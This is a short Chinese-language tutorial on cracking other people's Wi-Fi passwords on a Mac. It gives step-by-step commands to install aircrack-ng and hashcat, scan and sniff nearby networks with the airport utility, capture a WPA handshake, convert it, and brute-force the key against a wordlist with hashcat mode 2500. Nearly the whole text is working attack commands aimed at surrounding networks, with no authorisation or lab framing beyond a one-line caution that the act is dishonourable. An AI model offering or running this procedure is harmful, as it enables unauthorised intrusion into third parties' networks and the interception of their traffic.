WIFI密码破解

1. 安装xcode,macport

    安装aircrack-ng

        sudo port install aircrack-ng

    安装Hashcat ,

        cd hashcat//进入目录sudo make

        sudo make install //安装hashcat

        hashcat -V 如看到版本信息则安装成功

    安装Hashcat-utils

        cd hashcat-utils/src

        make && mv *.bin ../bin

        cd ../bin

        sudo install cap2hccapx.bin /usr/local/bin/cap2hccapx

    密码生成器：Crunch  使用

        这里有个可以下载，我没用过，仅供参考密码字典

    

3.获取当前网卡

    ifconfig 例：我的en0

4.获取周围的WIFI

    sudo     /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

5.开始抓包 ， 收集监听周围无线网络的数据

    sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6 

    当执行以上命令， 开始监听以后，wifi的图标会变成一个小眼睛

    监听久一点， 然后使用ctrl+c停止监听， 数据保存到/tmp/airportSniffxxxx.cap文件中

sudo aircrack-ng xxxxx.cap 

如果Encryption值为WPA(1 handshake) ，说明抓取成功， 否者跳到要重新抓取

    (在监听的过程中如果有用户登陆这个wifi， 那么包就会被我们截获， 如果用户一直没有登陆到这个wifi， 我们就还要继续等待监听， 尽量在手机或者手提电脑所用高峰期开启捕获， 这样捕获握手（handshake）的几率比较高)

6.将.cap转换为.hccapx

    cd到.cap存放目录    cap2hccapx xx.cap xx.hccapx

7.

    hashcat -m 2500 xx.hccapx pwd.txt    （pwd.txt为爆破字典 --show可显示内容)

总结：必须要有一个非常强大的爆破字典，不然一切都是徒劳。还有，此行为并不光彩，请谨慎操作。